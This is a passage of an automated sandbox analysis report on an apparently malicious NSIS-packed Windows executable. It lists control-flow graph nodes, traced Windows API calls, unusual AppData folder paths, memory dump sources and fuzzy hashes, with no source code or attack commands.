                                                      • 771: 4015dc-4015ef (call 405f7e)
                                                      • 773: 401668-4022fb (call 401423)
                                                      • 774: 40163b-40165a (call 401423, call 406682, SetCurrentDirectoryW)
                                                      • 780: 4015f1-4015f4
                                                      • 781: 401609-40160c (call 405c30)
                                                      • 782: 4015f6-4015fd (call 405c4d)
                                                      • 788: 402c2f-402c3e
                                                      • 789: 401611-401613
                                                      • 791: 401660-401663
                                                      • 792: 401615-40161a
                                                      • 793: 40162c-401634
                                                      • 796: 4015ff-401607 (call 405bd6)
                                                      • 797: 401629
                                                      • 798: 40161c-401627 (GetFileAttributesW)
                                                      Edges: 765->770, 765->771, 770->773, 770->774, 771->780, 771->781, 773->788, 774->788, 774->791, 780->781, 780->782, 781->789, 782->781, 782->796, 789->792, 789->793, 791->788, 792->797, 792->798, 793->770, 793->771, 796->789, 797->793, 798->793, 798->797
                                                      APIs
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 0040600A
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                        • Part of subcall function 00405BD6: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405C18
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151,?,00000000,000000F0), ref: 00401652
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151, xrefs: 00401645
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151
                                                      • API String ID: 1892508949-1983529546
                                                      • Opcode ID: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
                                                      • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                      • Opcode Fuzzy Hash: aa5dd310b5d70740701a2a3e4b5f3b448a7aae78f9a2a95781e07c92bd5766b4
                                                      • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph
                                                      
                                                      Nodes (basic blocks with the calls they contain):
                                                      • 801: 406059-406074 (call 406682, call 405ffc)
                                                      • 806: 406076-406078
                                                      • 807: 40607a-406087 (call 406930)
                                                      • 808: 4060d2-4060d4
                                                      • 811: 406097-40609b
                                                      • 812: 406089-40608f
                                                      • 813: 406091-406095
                                                      • 814: 4060b1-4060ba (lstrlenW)
                                                      • 815: 4060bc-4060d0 (call 405f51, GetFileAttributesW)
                                                      • 816: 40609d-4060a4 (call 4069df)
                                                      • 821: 4060a6-4060a9
                                                      • 822: 4060ab-4060ac (call 405f9d)
                                                      Edges: 801->806, 801->807, 806->808, 807->811, 807->812, 811->814, 812->806, 812->813, 813->806, 813->811, 814->815, 814->816, 815->808, 816->821, 816->822, 821->806, 821->822, 822->814
                                                      APIs
                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 0040600A
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                        • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                      • lstrlenW.KERNEL32(00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe"), ref: 004060B2
                                                      • GetFileAttributesW.KERNELBASE(00425750,00425750,00425750,00425750,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004060C2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: PWB
                                                      • API String ID: 3248276644-4275379341
                                                      • Opcode ID: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                      • Instruction ID: c6e62d849c1808a59ce2984a64bb42424f7e4e7bb9f9a1371c2689eace45329e
                                                      • Opcode Fuzzy Hash: 8ac32a27a18f4c2dd493eafaed9bce6c13b36ca5a95e32c2f60d88480e43d1b4
                                                      • Instruction Fuzzy Hash: 17F04426144E6219D632723A0C05EAF26148F82354B57463FF853B22D1DF3C8D62C17E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                      • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                      • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                      • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                      • Instruction ID: e1ca38fbe1868b0530a5cca2aefb0608b46060051e5a62990b8a86f9073b7715
                                                      • Opcode Fuzzy Hash: 8d5ea1f57b3c7a51107eeb32950adad6d0a1e952e0bb086014bf19e576e1a16a
                                                      • Instruction Fuzzy Hash: 61912370D04228CBDF28CF98C8547ADBBB1FF44305F14856AD856BB291C778AA86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                      • Instruction ID: c8babd12d4b9043659ede3bd230c10fd4be49189821a01af26e4b19fb55261c2
                                                      • Opcode Fuzzy Hash: 2a4d9994a082143c1c144eb36683b4c65f38247d7a35d367480abefccda07661
                                                      • Instruction Fuzzy Hash: B1813571D04228DBDF24CFA8C8847ADBBB1FF44305F24856AD456BB281C778AA86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                      • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                      • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                      • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                      • Instruction ID: 95d77a19c0962547fc3f67c13c4944abdc30b9b20558c44938f244593de0d4a6
                                                      • Opcode Fuzzy Hash: e36820fe09b78ea4b76e3bf6ab2fb301930f737046964227b4143800bf5a8c7d
                                                      • Instruction Fuzzy Hash: 49713471D04228CBDF24CFA8C8847ADBBB1FF48305F15806AD856BB281C7386986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670242474.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                      • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                      • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                      • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                      • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                      • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                      • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                        • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FilePointer$CountTick
                                                      • String ID:
                                                      • API String ID: 1092082344-0
                                                      • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                      • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                      • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                      • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                      • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseValue
                                                      • String ID:
                                                      • API String ID: 397863658-0
                                                      • Opcode ID: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
                                                      • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                      • Opcode Fuzzy Hash: d7c3bcff9e3486ffb53bc3915b5cff87963c4f43fcbf315e35984deb84fc55ed
                                                      • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                      • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                      • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                      • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                      • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID:
                                                      • API String ID: 3356406503-0
                                                      • Opcode ID: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
                                                      • Instruction ID: 56becb9136408d6600d44ef8ee1fb8662aacbb8094ba5771dc16c944e9e3e358
                                                      • Opcode Fuzzy Hash: 3f9e4d0e37633bf98c355a218f283f93097903ae4b557426e4e4ad18f8810dd1
                                                      • Instruction Fuzzy Hash: 39116D71900219EADF14DFA0DA589AE77B4BF04349F20447FE406B62C0D7B84A45EB5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                      • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                      • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                      • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 004057EA
                                                        • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 00405836
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: InitializeMessageSendUninitialize
                                                      • String ID:
                                                      • API String ID: 2896919175-0
                                                      • Opcode ID: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                      • Instruction ID: 47b15979fd2771e4c3211fb1205fa32a21028b5b356e028cb2016eb217598776
                                                      • Opcode Fuzzy Hash: 6b48ba6f2f212ba91ce3a94f30354a0bb9d691122d035e2291a9dc674f3f10d0
                                                      • Instruction Fuzzy Hash: 9EF09073A006009AEB116B54AE01B6B77A4FBD4705F05843AEE84632A1DB794C128B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                      • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_586 R1 M-LINE - GEORGIA 03.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3712363035-0
                                                      • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                      • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                      • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                      • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                        • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                        • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                        • Part of subcall function 00406A06: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1670110617.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1670097737.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670123847.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1670136553.0000000000427000.00000004.00000001.01000000.00000003.sdmp
